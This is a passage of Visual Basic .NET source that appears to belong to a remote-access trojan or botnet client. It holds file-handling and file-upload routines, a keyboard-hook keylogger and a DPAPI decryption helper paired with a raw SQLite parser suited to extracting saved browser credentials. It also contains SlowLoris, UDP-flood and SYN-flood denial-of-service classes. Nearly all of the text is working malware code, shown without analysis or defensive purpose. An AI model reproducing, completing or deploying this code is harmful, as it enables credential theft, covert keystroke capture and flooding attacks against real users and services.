1426 My.Computer.FileSystem.MoveDirectory(oldpath, newpath & name, True)
1427 Catch
1428 End Try
1429 End Sub
1430 Sub copydirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1431 Try
1432 My.Computer.FileSystem.CopyDirectory(oldpath, newpath & name, True)
1433 Catch
1434 End Try
1435 End Sub
1436 Sub CreateNewFile(ByVal txt As String)
1437 Try
1438 txt = txt.Replace("mkfile", "")
1439 Dim path As String = txt.Split("|")(0)
1440 Dim content As String = txt.Split("|")(1)
1441 IO.File.WriteAllText(path, content)
1442 Catch
1443 End Try
1444 End Sub
1445 Sub deletefile(ByVal path As String)
1446 Try
1447 My.Computer.FileSystem.DeleteFile(path, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
1448 Catch
1449 End Try
1450 End Sub
1451 Sub renamefile(ByVal path As String, ByVal newname As String)
1452 Try
1453 My.Computer.FileSystem.RenameFile(path, newname)
1454 Catch
1455 End Try
1456 End Sub
1457 Sub movefile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1458 Try
1459 My.Computer.FileSystem.MoveFile(oldpath, newpath & name, True)
1460 Catch
1461 End Try
1462 End Sub
1463 Sub copyfile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1464 Try
1465 My.Computer.FileSystem.CopyFile(oldpath, newpath & name, True)
1466 Catch
1467 End Try
1468 End Sub
1469 Sub sharefile(ByVal filepath As String)
1470 Dim file As String = Convert.ToBase64String(IO.File.ReadAllBytes(filepath))
1471 Send(AES_Encrypt("IncomingFile" & file, enckey))
1472 End Sub
1473 End Class
1474 Public Class SlowLoris
1475 Public Shared TList As New System.Collections.Generic.List(Of Thread)()
1476 Public Target As String = ""
1477 Public AOThreads As Integer = 50
1478 Public AOSockets As Integer = 70
1479 Dim IsFlooding As Boolean = True
1480 Dim WithEvents tmrGenerateRandomData As New System.Windows.Forms.Timer
1481 Dim labeldatasent As String
1482 Sub Start()
1483 Try
1484 tmrGenerateRandomData.Start()
1485 IsFlooding = True
1486 For i As Integer = 0 To AOSockets - 1
1487 TList.Add((New Thread(New ThreadStart(AddressOf InitFlood))))
1488 TList(TList.Count - 1).Start()
1489 Next
1490 Catch
1491 End Try
1492 End Sub
1493 Public Function GenerateChar(ByVal intLength As Integer, Optional ByVal strAllowedCharacters As String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") As String
1494 Randomize()
1495 Dim chrChars() As Char = strAllowedCharacters.ToCharArray
1496 Dim strReturn As New StringBuilder
1497 Dim grtRandom As New Random
1498 Do Until Len(strReturn.ToString) = intLength
1499 Dim x As Integer = Rnd() * (chrChars.Length - 1)
1500 strReturn.Append(chrChars(CInt(x)))
1501 Loop
1502 Return strReturn.ToString
1503 End Function
1504 Private Sub InitFlood()
1505 Dim Shocks As Socket() = New Socket(AOThreads - 1) {}
1506 Dim uri As New Uri(Target)
1507 For i As Integer = 0 To AOThreads - 1
1508 If Not IsFlooding Then
1509 GoTo ENDLOOP
1510 End If
1511 Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1512 Next
1513 While True
1514 If Not IsFlooding Then
1515 GoTo ENDLOOP
1516 End If
1517 For i As Integer = 0 To AOThreads - 1
1518 If Not IsFlooding Then
1519 GoTo ENDLOOP
1520 End If
1521 If Not Shocks(i).Connected Then
1522RETRY_CONNECT:
1523 If Not IsFlooding Then
1524 GoTo ENDLOOP
1525 End If
1526 Try
1527 Shocks(i) = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
1528 Shocks(i).Connect(Dns.GetHostAddresses(uri.Host)(0), 80)
1529 Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("GET " & uri.PathAndQuery &
1530 " HTTP/1.1" & vbCr & vbLf & "Host: " & uri.Host & vbCr & vbLf & "User-Agent: " &
1531 labeldatasent & " (config: per_thread=" & AOThreads & "; aotv2=" & AOSockets & ";)" & vbCr & vbLf), SocketFlags.None)
1532 Catch generatedExceptionName As Exception
1533 If Not IsFlooding Then
1534 GoTo ENDLOOP
1535 End If
1536 Thread.Sleep(1000)
1537 GoTo RETRY_CONNECT
1538 End Try
1539 End If
1540 If Not IsFlooding Then
1541 GoTo ENDLOOP
1542 End If
1543 Next
1544 If Not IsFlooding Then
1545 GoTo ENDLOOP
1546 End If
1547[LOOP]:
1548 If Not IsFlooding Then
1549 GoTo ENDLOOP
1550 End If
1551 Try
1552 For i As Integer = 0 To AOThreads - 1
1553 If Not IsFlooding Then
1554 GoTo ENDLOOP
1555 End If
1556
1557 Shocks(i).Send(System.Text.Encoding.ASCII.GetBytes("X-" & Randomnum(10) & ": 1" & vbCr & vbLf), SocketFlags.None)
1558 Next
1559 Catch ex As Exception
1560 End Try
1561 Thread.Sleep(4000)
1562 If Not IsFlooding Then
1563 GoTo ENDLOOP
1564 End If
1565 GoTo [LOOP]
1566 End While
1567ENDLOOP:
1568 For i As Integer = 0 To AOThreads - 1
1569 If Shocks(i).Connected Then
1570 Shocks(i).Disconnect(False)
1571 End If
1572 Shocks(i) = Nothing
1573 Next
1574 End Sub
1575 Private r As New Random(Environment.TickCount)
1576 Public Function Randomnum(ByVal length As Integer) As String
1577 Dim outstr As String = ""
1578 For i As Integer = 0 To length - 1
1579 outstr += r.[Next](9)
1580 Next
1581 Return outstr
1582 End Function
1583 Private Sub tmrGenerateRandomData_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrGenerateRandomData.Tick
1584 labeldatasent = GenerateChar(16)
1585 End Sub
1586 Sub StopFlood()
1587 tmrGenerateRandomData.Stop()
1588 IsFlooding = False
1589 TList.Clear()
1590 For Each t As Thread In TList
1591 If t.ThreadState <> ThreadState.Stopped Then
1592 Return
1593 End If
1594 Next
1595 End Sub
1596 End Class
1597 Public Class Keylogger
1598 Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" (ByVal Hook As Integer, ByVal KeyDelegate As KDel, ByVal HMod As Integer, ByVal ThreadId As Integer) As Integer
1599 Private Declare Function CallNextHookEx Lib "user32" (ByVal Hook As Integer, ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1600 Private Declare Function UnhookWindowsHookEx Lib "user32" Alias "UnhookWindowsHookEx" (ByVal Hook As Integer) As Integer
1601 Private Delegate Function KDel(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1602 Public Shared Event Down(ByVal Key As String)
1603 Public Shared Event Up(ByVal Key As String)
1604 Private Shared Key As Integer
1605 Private Shared KHD As KDel
1606 Private Structure KeyStructure : Public Code As Integer : Public ScanCode As Integer : Public Flags As Integer : Public Time As Integer : Public ExtraInfo As Integer : End Structure
1607 Public Sub CreateHook()
1608 KHD = New KDel(AddressOf Proc)
1609 Key = SetWindowsHookEx(13, KHD, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
1610 End Sub
1611
1612 Private Function Proc(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KeyStructure) As Integer
1613 If (Code = 0) Then
1614 Select Case wParam
1615 Case &H100, &H104 : RaiseEvent Down(Feed(CType(lParam.Code, Keys)))
1616 Case &H101, &H105 : RaiseEvent Up(Feed(CType(lParam.Code, Keys)))
1617 End Select
1618 End If
1619 Return CallNextHookEx(Key, Code, wParam, lParam)
1620 End Function
1621 Public Sub DiposeHook()
1622 UnhookWindowsHookEx(Key)
1623 MyBase.Finalize()
1624 End Sub
1625 Private Function Feed(ByVal e As Keys) As String
1626 Select Case e
1627 Case 65 To 90
1628 If Control.IsKeyLocked(Keys.CapsLock) Or (Control.ModifierKeys And Keys.Shift) <> 0 Then
1629 Return e.ToString
1630 Else
1631 Return e.ToString.ToLower
1632 End If
1633 Case 48 To 57
1634 If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1635 Select Case e.ToString
1636 Case "D1" : Return "!"
1637 Case "D2" : Return "@"
1638 Case "D3" : Return "#"
1639 Case "D4" : Return "$"
1640 Case "D5" : Return "%"
1641 Case "D6" : Return "^"
1642 Case "D7" : Return "&"
1643 Case "D8" : Return "*"
1644 Case "D9" : Return "("
1645 Case "D0" : Return ")"
1646 End Select
1647 Else
1648 Return e.ToString.Replace("D", Nothing)
1649 End If
1650 Case 96 To 105
1651 Return e.ToString.Replace("NumPad", Nothing)
1652 Case 106 To 111
1653 Select Case e.ToString
1654 Case "Divide" : Return "/"
1655 Case "Multiply" : Return "*"
1656 Case "Subtract" : Return "-"
1657 Case "Add" : Return "+"
1658 Case "Decimal" : Return "."
1659 End Select
1660 Case 32
1661 Return " "
1662 Case 186 To 222
1663 If (Control.ModifierKeys And Keys.Shift) <> 0 Then
1664 Select Case e.ToString
1665 Case "OemMinus" : Return "_"
1666 Case "Oemplus" : Return "+"
1667 Case "OemOpenBrackets" : Return "{"
1668 Case "Oem6" : Return "}"
1669 Case "Oem5" : Return "|"
1670 Case "Oem1" : Return ":"
1671 Case "Oem7" : Return """"
1672 Case "Oemcomma" : Return "<"
1673 Case "OemPeriod" : Return ">"
1674 Case "OemQuestion" : Return "?"
1675 Case "Oemtilde" : Return "~"
1676 End Select
1677 Else
1678 Select Case e.ToString
1679 Case "OemMinus" : Return "-"
1680 Case "Oemplus" : Return "="
1681 Case "OemOpenBrackets" : Return "["
1682 Case "Oem6" : Return "]"
1683 Case "Oem5" : Return "\"
1684 Case "Oem1" : Return ";"
1685 Case "Oem7" : Return "'"
1686 Case "Oemcomma" : Return ","
1687 Case "OemPeriod" : Return "."
1688 Case "OemQuestion" : Return "/"
1689 Case "Oemtilde" : Return "`"
1690 End Select
1691 End If
1692 Case Keys.Return
1693 Return Environment.NewLine
1694 Case Else
1695 Return "<" + e.ToString + ">"
1696 End Select
1697 Return Nothing
1698 End Function
1699 End Class
1700#Region "Module Main, Functions & Variables"
1701 Module Main
1702 Dim text As String
1703 <DllImport("Crypt32.dll", SetLastError:=True, CharSet:=System.Runtime.InteropServices.CharSet.Auto)>
1704 Private Function CryptUnprotectData(ByRef pDataIn As DATA_BLOB, ByVal szDataDescr As String, ByRef pOptionalEntropy As DATA_BLOB, ByVal pvReserved As IntPtr, ByRef pPromptStruct As CRYPTPROTECT_PROMPTSTRUCT, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Boolean
1705 End Function
1706
1707 <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure CRYPTPROTECT_PROMPTSTRUCT
1708 Public cbSize As Integer
1709 Public dwPromptFlags As CryptProtectPromptFlags
1710 Public hwndApp As IntPtr
1711 Public szPrompt As String
1712 End Structure
1713 <Flags()> Enum CryptProtectPromptFlags
1714 CRYPTPROTECT_PROMPT_ON_UNPROTECT = &H1
1715 CRYPTPROTECT_PROMPT_ON_PROTECT = &H2
1716 End Enum
1717 Function Decrypt(ByVal Datas() As Byte) As String
1718 Dim inj, Ors As New DATA_BLOB
1719 Dim Ghandle As GCHandle = GCHandle.Alloc(Datas, GCHandleType.Pinned)
1720 inj.pbData = Ghandle.AddrOfPinnedObject()
1721 inj.cbData = Datas.Length
1722 Ghandle.Free()
1723 CryptUnprotectData(inj, Nothing, Nothing, Nothing, Nothing, 0, Ors)
1724 Dim Returned() As Byte = New Byte(Ors.cbData) {}
1725 Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData)
1726 Dim TheString As String = Encoding.Default.GetString(Returned)
1727 Return TheString.Substring(0, TheString.Length - 1)
1728 End Function
1729 <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> Structure DATA_BLOB
1730 Public cbData As Integer
1731 Public pbData As IntPtr
1732 End Structure
1733 End Module
1734 Public Class SQLiteHandler
1735 Private db_bytes() As Byte
1736 Private page_size As UInt16
1737 Private encoding As UInt64
1738 Private master_table_entries() As sqlite_master_entry
1739
1740 Private SQLDataTypeSize() As Byte = New Byte() {0, 1, 2, 3, 4, 6, 8, 8, 0, 0}
1741 Private table_entries() As table_entry
1742 Private field_names() As String
1743
1744 Private Structure record_header_field
1745 Dim size As Int64
1746 Dim type As Int64
1747 End Structure
1748
1749 Private Structure table_entry
1750 Dim row_id As Int64
1751 Dim content() As String
1752 End Structure
1753
1754 Private Structure sqlite_master_entry
1755 Dim row_id As Int64
1756 Dim item_type As String
1757 Dim item_name As String
1758 Dim astable_name As String
1759 Dim root_num As Int64
1760 Dim sql_statement As String
1761 End Structure
1762
1763 Private Function GVL(ByVal startIndex As Integer) As Integer
1764 If startIndex > db_bytes.Length Then Return Nothing
1765
1766 For i As Integer = startIndex To startIndex + 8 Step 1
1767 If i > db_bytes.Length - 1 Then
1768 Return Nothing
1769 ElseIf (db_bytes(i) And &H80) <> &H80 Then
1770 Return i
1771 End If
1772 Next
1773
1774 Return startIndex + 8
1775 End Function
1776
1777 Private Function CVL(ByVal startIndex As Integer, ByVal endIndex As Integer) As Int64
1778 endIndex = endIndex + 1
1779
1780 Dim retus(7) As Byte
1781 Dim Length As Object = endIndex - startIndex
1782 Dim Bit64 As Boolean = False
1783
1784 If Length = 0 Or Length > 9 Then Return Nothing
1785 If Length = 1 Then
1786 retus(0) = (db_bytes(startIndex) And &H7F)
1787 Return BitConverter.ToInt64(retus, 0)
1788 End If
1789
1790 If Length = 9 Then
1791 Bit64 = True
1792 End If
1793
1794 Dim j As Integer = 1
1795 Dim k As Integer = 7
1796 Dim y As Integer = 0
1797
1798 If Bit64 Then
1799 retus(0) = db_bytes(endIndex - 1)
1800 endIndex = endIndex - 1
1801 y = 1
1802 End If
1803
1804 For i As Integer = (endIndex - 1) To startIndex Step -1
1805 If (i - 1) >= startIndex Then
1806 retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j)) Or (db_bytes(i - 1) << k)
1807 j = j + 1
1808 y = y + 1
1809 k = k - 1
1810 Else
1811 If Not Bit64 Then retus(y) = ((db_bytes(i) >> (j - 1)) And (&HFF >> j))
1812 End If
1813 Next
1814
1815 Return BitConverter.ToInt64(retus, 0)
1816 End Function
1817
1818 Private Function IsOdd(ByVal value As Int64) As Boolean
1819 Return (value And 1) = 1
1820 End Function
1821
1822 Private Function ConvertToInteger(ByVal startIndex As Integer, ByVal Size As Integer) As UInt64
1823 If Size > 8 Or Size = 0 Then Return Nothing
1824
1825 Dim retVal As UInt64 = 0
1826
1827 For i As Integer = 0 To Size - 1 Step 1
1828 retVal = ((retVal << 8) Or db_bytes(startIndex + i))
1829 Next
1830
1831 Return retVal
1832 End Function
1833
1834 Private Sub ReadMasterTable(ByVal Offset As UInt64)
1835
1836 If db_bytes(Offset) = &HD Then
1837
1838 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1839 Dim ol As Integer = 0
1840
1841 If Not master_table_entries Is Nothing Then
1842 ol = master_table_entries.Length
1843 ReDim Preserve master_table_entries(master_table_entries.Length + Length)
1844 Else
1845 ReDim master_table_entries(Length)
1846 End If
1847
1848 Dim ent_offset As UInt64
1849
1850 For i As Integer = 0 To Length Step 1
1851 ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1852
1853 If Offset <> 100 Then ent_offset = ent_offset + Offset
1854
1855 Dim t As Object = GVL(ent_offset)
1856 Dim size As Int64 = CVL(ent_offset, t)
1857
1858 Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1859 master_table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1860
1861 ent_offset = ent_offset + (s - ent_offset) + 1
1862
1863 t = GVL(ent_offset)
1864 s = t
1865 Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1866
1867 Dim Field_Size(4) As Int64
1868
1869 For j As Integer = 0 To 4 Step 1
1870 t = s + 1
1871 s = GVL(t)
1872 Field_Size(j) = CVL(t, s)
1873
1874 If Field_Size(j) > 9 Then
1875 If IsOdd(Field_Size(j)) Then
1876 Field_Size(j) = (Field_Size(j) - 13) / 2
1877 Else
1878 Field_Size(j) = (Field_Size(j) - 12) / 2
1879 End If
1880 Else
1881 Field_Size(j) = SQLDataTypeSize(Field_Size(j))
1882 End If
1883 Next
1884
1885 If encoding = 1 Then
1886 master_table_entries(ol + i).item_type = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1887 ElseIf encoding = 2 Then
1888 master_table_entries(ol + i).item_type = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1889 ElseIf encoding = 3 Then
1890 master_table_entries(ol + i).item_type = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size, Field_Size(0))
1891 End If
1892 If encoding = 1 Then
1893 master_table_entries(ol + i).item_name = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1894 ElseIf encoding = 2 Then
1895 master_table_entries(ol + i).item_name = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1896 ElseIf encoding = 3 Then
1897 master_table_entries(ol + i).item_name = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0), Field_Size(1))
1898 End If
1899 master_table_entries(ol + i).root_num = ConvertToInteger(ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2), Field_Size(3))
1900 If encoding = 1 Then
1901 master_table_entries(ol + i).sql_statement = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1902 ElseIf encoding = 2 Then
1903 master_table_entries(ol + i).sql_statement = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1904 ElseIf encoding = 3 Then
1905 master_table_entries(ol + i).sql_statement = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + Field_Size(0) + Field_Size(1) + Field_Size(2) + Field_Size(3), Field_Size(4))
1906 End If
1907 Next
1908 ElseIf db_bytes(Offset) = &H5 Then
1909 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1910 Dim ent_offset As UInt16
1911
1912 For i As Integer = 0 To Length Step 1
1913 ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
1914
1915 If Offset = 100 Then
1916 ReadMasterTable((ConvertToInteger(ent_offset, 4) - 1) * page_size)
1917 Else
1918 ReadMasterTable((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
1919 End If
1920
1921 Next
1922
1923 ReadMasterTable((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
1924 End If
1925 End Sub
1926
1927 Private Function ReadTableFromOffset(ByVal Offset As UInt64) As Boolean
1928 If db_bytes(Offset) = &HD Then
1929
1930 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
1931 Dim ol As Integer = 0
1932
1933 If Not table_entries Is Nothing Then
1934 ol = table_entries.Length
1935 ReDim Preserve table_entries(table_entries.Length + Length)
1936 Else
1937 ReDim table_entries(Length)
1938 End If
1939
1940 Dim ent_offset As UInt64
1941
1942 For i As Integer = 0 To Length Step 1
1943 ent_offset = ConvertToInteger(Offset + 8 + (i * 2), 2)
1944
1945 If Offset <> 100 Then ent_offset = ent_offset + Offset
1946
1947 Dim t As Object = GVL(ent_offset)
1948 Dim size As Int64 = CVL(ent_offset, t)
1949
1950 Dim s As Object = GVL(ent_offset + (t - ent_offset) + 1)
1951 table_entries(ol + i).row_id = CVL(ent_offset + (t - ent_offset) + 1, s)
1952
1953 ent_offset = ent_offset + (s - ent_offset) + 1
1954
1955 t = GVL(ent_offset)
1956 s = t
1957 Dim Rec_Header_Size As Int64 = CVL(ent_offset, t)
1958
1959 Dim Field_Size() As record_header_field = Nothing
1960 Dim size_read As Int64 = (ent_offset - t) + 1
1961 Dim j As Object = 0
1962
1963 While size_read < Rec_Header_Size
1964 ReDim Preserve Field_Size(j)
1965
1966 t = s + 1
1967 s = GVL(t)
1968 Field_Size(j).type = CVL(t, s)
1969
1970 If Field_Size(j).type > 9 Then
1971 If IsOdd(Field_Size(j).type) Then
1972 Field_Size(j).size = (Field_Size(j).type - 13) / 2
1973 Else
1974 Field_Size(j).size = (Field_Size(j).type - 12) / 2
1975 End If
1976 Else
1977 Field_Size(j).size = SQLDataTypeSize(Field_Size(j).type)
1978 End If
1979
1980 size_read = size_read + (s - t) + 1
1981 j = j + 1
1982 End While
1983
1984 ReDim table_entries(ol + i).content(Field_Size.Length - 1)
1985 Dim counter As Integer = 0
1986
1987 For k As Integer = 0 To Field_Size.Length - 1 Step 1
1988 If Field_Size(k).type > 9 Then
1989 If Not IsOdd(Field_Size(k).type) Then
1990 If encoding = 1 Then
1991 table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1992 ElseIf encoding = 2 Then
1993 table_entries(ol + i).content(k) = System.Text.Encoding.Unicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1994 ElseIf encoding = 3 Then
1995 table_entries(ol + i).content(k) = System.Text.Encoding.BigEndianUnicode.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1996 End If
1997 Else
1998 table_entries(ol + i).content(k) = System.Text.Encoding.Default.GetString(db_bytes, ent_offset + Rec_Header_Size + counter, Field_Size(k).size)
1999 End If
2000 Else
2001 table_entries(ol + i).content(k) = CStr(ConvertToInteger(ent_offset + Rec_Header_Size + counter, Field_Size(k).size))
2002 End If
2003
2004 counter = counter + Field_Size(k).size
2005 Next
2006 Next
2007 ElseIf db_bytes(Offset) = &H5 Then
2008 Dim Length As UInt16 = ConvertToInteger(Offset + 3, 2) - 1
2009 Dim ent_offset As UInt16
2010
2011 For i As Integer = 0 To Length Step 1
2012 ent_offset = ConvertToInteger(Offset + 12 + (i * 2), 2)
2013
2014 ReadTableFromOffset((ConvertToInteger(Offset + ent_offset, 4) - 1) * page_size)
2015 Next
2016
2017 ReadTableFromOffset((ConvertToInteger(Offset + 8, 4) - 1) * page_size)
2018 End If
2019
2020 Return True
2021 End Function
2022
2023 Public Function ReadTable(ByVal TableName As String) As Boolean
2024
2025 Dim found As Integer = -1
2026
2027 For i As Integer = 0 To master_table_entries.Length Step 1
2028 If master_table_entries(i).item_name.ToLower().CompareTo(TableName.ToLower()) = 0 Then
2029 found = i
2030 Exit For
2031 End If
2032 Next
2033
2034 If found = -1 Then Return False
2035
2036 Dim fields() As Object = master_table_entries(found).sql_statement.Substring(master_table_entries(found).sql_statement.IndexOf("(") + 1).Split(",")
2037
2038 For i As Integer = 0 To fields.Length - 1 Step 1
2039 fields(i) = LTrim(fields(i))
2040
2041 Dim index As Object = fields(i).IndexOf(" ")
2042
2043 If index > 0 Then fields(i) = fields(i).Substring(0, index)
2044
2045 If fields(i).IndexOf("UNIQUE") = 0 Then
2046 Exit For
2047 Else
2048 ReDim Preserve field_names(i)
2049 field_names(i) = fields(i)
2050 End If
2051 Next
2052
2053 Return ReadTableFromOffset((master_table_entries(found).root_num - 1) * page_size)
2054 End Function
2055
2056 Public Function GetRowCount() As Integer
2057 Return table_entries.Length
2058 End Function
2059
2060 Public Function GetValue(ByVal row_num As Integer, ByVal field As Integer) As String
2061 If row_num >= table_entries.Length Then Return Nothing
2062 If field >= table_entries(row_num).content.Length Then Return Nothing
2063
2064 Return table_entries(row_num).content(field)
2065 End Function
2066
2067 Public Function GetValue(ByVal row_num As Integer, ByVal field As String) As String
2068 Dim found As Integer = -1
2069
2070 For i As Integer = 0 To field_names.Length Step 1
2071 If field_names(i).ToLower().CompareTo(field.ToLower()) = 0 Then
2072 found = i
2073 Exit For
2074 End If
2075 Next
2076
2077 If found = -1 Then Return Nothing
2078
2079 Return GetValue(row_num, found)
2080 End Function
2081
2082 Public Function GetTableNames() As String()
2083 Dim retVal As String() = Nothing
2084 Dim arr As Object = 0
2085
2086 For i As Integer = 0 To master_table_entries.Length - 1 Step 1
2087 If master_table_entries(i).item_type = "table" Then
2088 ReDim Preserve retVal(arr)
2089 retVal(arr) = master_table_entries(i).item_name
2090 arr = arr + 1
2091 End If
2092 Next
2093
2094 Return retVal
2095 End Function
2096
2097 Public Sub New(ByVal baseName As String)
2098 If File.Exists(baseName) Then
2099 FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
2100 Dim asi As String = Space(LOF(1))
2101 FileGet(1, asi)
2102 FileClose(1)
2103
2104 db_bytes = System.Text.Encoding.Default.GetBytes(asi)
2105
2106 If System.Text.Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") <> 0 Then
2107 Throw New Exception("Not a valid SQLite 3 Database File")
2108 End
2109 End If
2110
2111 If db_bytes(52) <> 0 Then
2112 Throw New Exception("Auto-vacuum capable database is not supported")
2113 End
2114 ElseIf ConvertToInteger(44, 4) >= 4 Then
2115 Throw New Exception("No supported Schema layer file-format")
2116 End
2117 End If
2118
2119 page_size = ConvertToInteger(16, 2)
2120 encoding = ConvertToInteger(56, 4)
2121
2122 If encoding = 0 Then encoding = 1
2123
2124 ReadMasterTable(100)
2125 End If
2126 End Sub
2127 End Class
2128#End Region
2129#Region "DDoS"
2130 Public Class UDPFlood
2131 Public Shared Host As String
2132 Public Shared Port As Integer
2133 Public Shared Threads As Integer
2134 Public Shared FloodRunning As Boolean
2135 Public Shared udpClient As New Sockets.UdpClient
2136 Public Shared bytCommand As Byte() = New Byte() {}
2137 Public Shared IP As IPAddress
2138 Public Shared Sub StartUDPFlood()
2139 If FloodRunning = False Then
2140 FloodRunning = True
2141 bytCommand = Encoding.ASCII.GetBytes(GetBytes)
2142 IP = IPAddress.Parse(Host)
2143 For NumberOfThreads As Integer = 0 To Threads
2144 Dim Flooding As Thread
2145 Flooding = New Thread(AddressOf Flood)
2146 Flooding.Start()
2147 Next
2148 End If
2149 End Sub
2150 Public Shared Sub Flood()
2151 Do While FloodRunning = True
2152 Try
2153 udpClient.Connect(IP, Port)
2154 udpClient.Send(bytCommand, bytCommand.Length)
2155 Catch
2156 End Try
2157 Loop
2158 Thread.CurrentThread.Abort()
2159 End Sub
2160 Shared Sub StopUDPFlood()
2161 If FloodRunning = True Then
2162 FloodRunning = False
2163 End If
2164 End Sub
2165 Shared Function GetBytes() As String
2166 Dim R As New Random
2167 Dim Bytes As String = ""
2168 Dim Letters As String = "qwertyuioplkjhgfdsazxcvbnm"
2169 Dim Capitals As String = "QWERTYUIOPLKJHGFDSAZXCVBNM"
2170 Dim Numbers As String = "0123456789"
2171 Dim Signs As String = "!£$%^&*()-_=+]}{[;:'@#~<,.>/?"
2172 For i As Integer = 0 To R.Next(300, 500)
2173 Select Case R.Next(0, 4)
2174 Case 0
2175 Bytes += Letters.ToCharArray()(R.Next((R.Next(0, 26))))
2176 Case 1
2177 Bytes += Capitals.ToCharArray()(R.Next(0, 26))
2178 Case 2
2179 Bytes += Numbers.ToCharArray()(R.Next(0, 10))
2180 Case 3
2181 Bytes += Signs.ToCharArray()(R.Next(0, 29))
2182 End Select
2183 Next
2184 Return Bytes
2185 End Function
2186 End Class
2187 Public Class SynFlood
2188 Private Shared FloodingJob As ThreadStart()
2189 Private Shared FloodingThread As Thread()
2190 Public Shared Host As String
2191 Private Shared ipEo As IPEndPoint
2192 Public Shared Port As Integer
2193 Private Shared SynClass As SendSyn()
2194 Public Shared SynSockets As Integer
2195 Public Shared Threads As Integer
2196 Public Shared IsRunning As Boolean = False
2197 Public Shared Sub StartSynFlood()
2198 IsRunning = True
2199 Try
2200 ipEo = New IPEndPoint(Dns.GetHostEntry(Host).AddressList(0), Port)
2201 Catch
2202 ipEo = New IPEndPoint(IPAddress.Parse(Host), Port)
2203 End Try
2204 FloodingThread = New Thread(Threads - 1) {}
2205 FloodingJob = New ThreadStart(Threads - 1) {}
2206 SynClass = New SendSyn(Threads - 1) {}
2207 For i As Integer = 0 To Threads - 1
2208 SynClass(i) = New SendSyn(ipEo, SynSockets)
2209 FloodingJob(i) = New ThreadStart(AddressOf SynClass(i).Send)
2210 FloodingThread(i) = New Thread(FloodingJob(i))
2211 FloodingThread(i).Start()
2212 Next
2213 End Sub
2214 Public Shared Sub StopSynFlood()
2215 For i As Integer = 0 To Threads - 1
2216 Try
2217 FloodingThread(i).Abort()
2218 Catch
2219 End Try
2220 Next
2221 IsRunning = False
2222 End Sub
2223 Private Class SendSyn
2224 Private ipEo As IPEndPoint
2225 Private Sock As Socket()
2226 Private SynSockets As Integer
2227 Public Sub New(ByVal ipEo As IPEndPoint, ByVal SynSockets As Integer)
2228 Me.ipEo = ipEo
2229 Me.SynSockets = SynSockets
2230 End Sub
2231 Public Sub OnConnect(ByVal ar As IAsyncResult)
2232
2233 End Sub
2234 Public Sub Send()
2235 Dim num As Integer
2236Label_0000:
2237 Try
2238 Me.Sock = New Socket(Me.SynSockets - 1) {}
2239 For num = 0 To Me.SynSockets - 1
2240 Me.Sock(num) = New Socket(Me.ipEo.AddressFamily, SocketType.Stream, ProtocolType.Tcp)
2241 Me.Sock(num).Blocking = False
2242 Dim callback As New AsyncCallback(AddressOf Me.OnConnect)
2243 Me.Sock(num).BeginConnect(Me.ipEo, callback, Me.Sock(num))
2244 Next
2245 Thread.Sleep(100)
2246 For num = 0 To Me.SynSockets - 1
2247 If Me.Sock(num).Connected Then
2248 Me.Sock(num).Disconnect(False)
2249 End If
2250 Me.Sock(num).Close()
2251 Me.Sock(num) = Nothing
